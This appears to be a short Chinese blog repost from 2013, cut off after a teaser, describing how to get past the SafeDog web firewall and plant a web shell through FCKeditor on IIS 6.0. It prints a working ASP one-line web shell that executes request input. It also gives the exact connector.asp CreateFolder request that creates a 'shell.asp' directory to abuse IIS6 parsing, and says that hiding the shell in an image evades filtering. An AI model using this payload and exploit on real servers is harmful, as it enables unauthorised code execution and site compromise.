FCK变异目录突破安全狗

作者：admin 发布于：2013-10-3 23:28 Thursday 分类：网络转载

03Oct

安全狗升级了还是各种被咬，咬的蛋疼了。POST数据直接拦截！

今天遇到个FUK还是安全狗，在上传文件后自动重命名。

一句话<%Y=request(“X”)%> <%execute(Y)%> 

直接插入图片一句话貌似安全狗对此post不会拦截。

IIS6.0下解析创建文件夹.变_无语

用FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/shell.asp&NewFolderName=z&uuid=1244789975684

创建shell.asp成...

阅读全文>>

标签: fck0day

评论(0) 引用(30) 浏览(70371)